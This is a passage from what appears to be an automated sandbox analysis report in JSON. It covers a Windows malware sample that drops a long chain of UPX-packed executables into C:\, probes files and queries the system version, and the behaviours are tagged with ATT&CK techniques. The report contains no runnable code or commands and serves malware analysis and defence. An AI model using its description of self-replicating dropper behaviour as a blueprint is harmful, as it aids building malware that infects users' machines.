\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"c:\\ui\\SwDRM.dll\"\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to touch file \"C:\\Windows\\System32\\imm32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4822004.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"26224.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"226242.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"8402624.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"484648.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"4262848.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"20484.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"806288.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"hrrrr.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"vvvtjhp.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"fvbll.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"lpljbv.exe\" trying to access non-existent file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" writes file \"c:\\4822004.exe\"\n \"4822004.exe\" writes file \"c:\\26224.exe\"\n \"26224.exe\" writes file \"c:\\226242.exe\"\n \"226242.exe\" writes file \"c:\\8402624.exe\"\n \"8402624.exe\" writes file \"c:\\484648.exe\"\n \"484648.exe\" writes file \"c:\\4262848.exe\"\n \"4262848.exe\" writes file \"c:\\20484.exe\"\n \"20484.exe\" writes file \"c:\\806288.exe\"\n \"806288.exe\" writes file \"c:\\hrrrr.exe\"\n \"hrrrr.exe\" writes file \"c:\\vvvtjhp.exe\"\n \"vvvtjhp.exe\" writes file \"c:\\fvbll.exe\"\n \"fvbll.exe\" writes file \"c:\\lpljbv.exe\"\n \"lpljbv.exe\" writes file \"c:\\rjldjr.exe\"\n \"rjldjr.exe\" writes file \"c:\\ljlpvrx.exe\"\n \"ljlpvrx.exe\" writes file \"c:\\bfbfxx.exe\"\n \"bfbfxx.exe\" writes file \"c:\\2046660.exe\"\n \"2046660.exe\" writes file \"c:\\40484.exe\"\n \"40484.exe\" writes file \"c:\\jtjnrb.exe\"\n \"jtjnrb.exe\" writes file \"c:\\pvtnp.exe\"\n \"pvtnp.exe\" writes file \"c:\\nxlhfx.exe\"\n \"nxlhfx.exe\" writes file \"c:\\pddnp.exe\"\n \"pddnp.exe\" writes file \"c:\\tplfhb.exe\"\n \"tplfhb.exe\" writes file \"c:\\60202.exe\"\n \"60202.exe\" writes file \"c:\\6260866.exe\"\n \"6260866.exe\" writes file \"c:\\6686484.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"20406.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"486604.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2028060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dprdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nfhppl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4080282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vjntv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bpfndvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"blrpxnl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"pvrjd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"nbdbxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"tlvnl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"dtrfjn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lvttpxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lxvdh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jbbxlvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4408646.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"86668.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"08086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"624642.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"48064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"lxdxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lxdxh.exe]- [targetUID: 00000000-00001424]\n \"hltjhx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hltjhx.exe]- [targetUID: 00000000-00001424]\n \"fnlpb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnlpb.exe]- [targetUID: 00000000-00003600]\n \"nndlvj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nndlvj.exe]- [targetUID: 00000000-00003600]\n \"dvxnn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvxnn.exe]- [targetUID: 00000000-00002824]\n \"flflvfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\flflvfr.exe]- [targetUID: 00000000-00002524]\n \"dlbjrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dlbjrj.exe]- [targetUID: 00000000-00002524]\n \"840000.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\840000.exe]- [targetUID: 00000000-00003920]\n \"626080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\626080.exe]- [targetUID: 00000000-00001004]\n \"48080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\48080.exe]- [targetUID: 00000000-00001004]\n \"ltbfnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ltbfnb.exe]- [targetUID: 00000000-00003952]\n \"fxbfvbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxbfvbf.exe]- [targetUID: 00000000-00000900]\n \"vjjxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjjxj.exe]- [targetUID: 00000000-00004152]\n \"vpfhrjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vpfhrjh.exe]- [targetUID: 00000000-00004152]\n \"fnnbp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fnnbp.exe]- [targetUID: 00000000-00002556]\n \"prxnx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\prxnx.exe]- [targetUID: 00000000-00002556]\n \"tjbjhtr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjbjhtr.exe]- [targetUID: 00000000-00000276]\n \"tjttplv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tjttplv.exe]- [targetUID: 00000000-00001580]\n \"hnnnrvf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hnnnrvf.exe]- [targetUID: 00000000-00001580]\n \"xnvjvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xnvjvl.exe]- [targetUID: 00000000-00001876]\n \"vxdlrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vxdlrx.exe]- [targetUID: 00000000-00001876]\n \"lbbnbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lbbnbl.exe]- [targetUID: 00000000-00003180]\n \"bvrxv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bvrxv.exe]- [targetUID: 00000000-00003180]\n \"ftpltv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ftpltv.exe]- [targetUID: 00000000-00001444]\n \"880446.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\880446.exe]- [targetUID: 00000000-00001444]\n \"24808.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24808.exe]- [targetUID: 00000000-00002744]\n \"08622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08622.exe]- [targetUID: 00000000-00002744]\n \"0400068.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0400068.exe]- [targetUID: 00000000-00002192]\n \"4622600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4622600.exe]- [targetUID: 00000000-00002308]\n \"tnxhl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tnxhl.exe]- [targetUID: 00000000-00002040]\n \"lrbtfbt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lrbtfbt.exe]- [targetUID: 00000000-00002040]\n \"jtlftjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jtlftjr.exe]- [targetUID: 00000000-00004228]\n \"bjvtfxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjvtfxj.exe]- [targetUID: 00000000-00000564]\n \"rfbfjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rfbfjv.exe]- [targetUID: 00000000-00004072]\n \"6244848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6244848.exe]- [targetUID: 00000000-00004072]\n \"4022682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4022682.exe]- [targetUID: 00000000-00002736]\n \"vfdxfvl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vfdxfvl.exe]- [targetUID: 00000000-00003272]\n \"hpdphl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hpdphl.exe]- [targetUID: 00000000-00002412]\n \"24826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\24826.exe]- [targetUID: 00000000-00002412]\n \"6686484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6686484.exe]- [targetUID: 00000000-00004508]\n \"6260866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6260866.exe]- [targetUID: 00000000-00004508]\n \"60202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60202.exe]- [targetUID: 00000000-00004280]\n \"tplfhb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tplfhb.exe]- [targetUID: 00000000-00002380]\n \"pddnp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pddnp.exe]- [targetUID: 00000000-00002804]\n \"nxlhfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nxlhfx.exe]- [targetUID: 00000000-00002804]\n \"pvtnp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: 00000000-00004252]\n \"jtjnrb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jtjnrb.exe]- [targetUID: 00000000-00001660]\n \"40484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\40484.exe]- [targetUID: 00000000-00003748]\n \"2046660.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2046660.exe]- [targetUID: 00000000-00003812]\n \"bfbfxx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bfbfxx.exe]- [targetUID: 00000000-00003812]\n \"ljlpvrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ljlpvrx.exe]- [targetUID: 00000000-00006072]\n \"rjldjr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rjldjr.exe]- [targetUID: 00000000-00004328]\n \"lpljbv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lpljbv.exe]- [targetUID: 00000000-00004328]\n \"fvbll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fvbll.exe]- [targetUID: 00000000-00006124]\n \"vvvtjhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vvvtjhp.exe]- [targetUID: 00000000-00006088]\n \"hrrrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hrrrr.exe]- [targetUID: 00000000-00006088]\n \"806288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\806288.exe]- [targetUID: 00000000-00004216]\n \"20484.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20484.exe]- [targetUID: 00000000-00005936]\n \"4262848.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4262848.exe]- [targetUID: 00000000-00005936]\n \"484648.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\484648.exe]- [targetUID: 00000000-00005928]\n \"8402624.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8402624.exe]- [targetUID: 00000000-00005928]\n \"226242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\226242.exe]- [targetUID: 00000000-00005968]\n \"26224.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\26224.exe]- [targetUID: 00000000-00006044]\n \"4822004.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4822004.exe]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000240088f5240083f5240000000000000000000000220000000001ecdf12000000000050ed120095e126770e561700feffffff435c2a7750592a77aa000000b800000082f5240080f5240074e11200ace5120000000000000000000000000000000000000000000000000000000000000000001c5c297760d84275ffffffff1700000024e11200240000000300000014e6120040eb1200ace512008600000050e1120096ed2a77aaf52400a06a00758600000074e11200ace512000000000086008800a06a007574e11200916c0075aaf52400a06a0075a06a0075e4e5120002020000 (UID: 00000000-00005920)\n \"7481bbedbc273334586530c04b45fa23db4a5f57e91c31decbd96f94ec48e26c.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"4822004.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006044)\n \"4822004.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003d01d84d3d01d34d3d01000000000000000000002c00000000011ce312000000000080f0120095e126778d5b1700feffffff435c2a7750592a77aa000000b8000000d24d3d01d04d3d01a4e41200dce81200000000000000000000000000000000000000000000000000e014000000002c001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a77fa4d3d01a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c0075fa4d3d01a06a0075a06a007514e9120002020000 (UID: 00000000-00006044)\n \"4822004.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006044)\n \"26224.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"26224.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004301305343012b534301000000000000000000001f00000000011ce312000000000080f0120095e12677bf591700feffffff435c2a7750592a77aa000000b80000002a53430128534301a4e41200dce81200000000000000000000000000000000000000000000000000e014000000001f001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a7752534301a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c007552534301a06a0075a06a007514e9120002020000 (UID: 00000000-00005968)\n \"26224.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005968)\n \"226242.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"226242.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004701405347013b534701000000000000000000006100000000011ce312000000000080f0120095e12677715f1700feffffff435c2a7750592a77aa000000b80000003a53470138534701a4e41200dce81200000000000000000000000000000000000000000000000000e0140000000061001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a7762534701a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c007562534701a06a0075a06a007514e9120002020000 (UID: 00000000-00005996)\n \"226242.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005996)\n \"8402624.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000004101b0d94101abd94101000000000000000000002000000000011ce312000000000080f0120095e12677735d1700feffffff435c2a7750592a77aa000000b8000000aad94101a8d94101a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a77d2d94101a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c0075d2d94101a06a0075a06a007514e9120002020000 (UID: 00000000-00005928)\n \"8402624.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005928)\n \"484648.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006016)\n \"484648.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000360190c636018bc63601000000000000000000002000000000011ce312000000000080f0120095e126775d471700feffffff435c2a7750592a77aa000000b80000008ac6360188c63601a4e41200dce8120000000000000000000000000000000000000000000000000060150000000020001c5c297760d84275ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2a77b2c63601a06a007586000000a4e41200dce812000000000086008800a06a0075a4e41200916c0075b2c63601a06a0075a06a007514e9120002020000 (UID: 00000000-00006016)\n \"484648.exe\" called \"RtlGetVersion\" with parameter 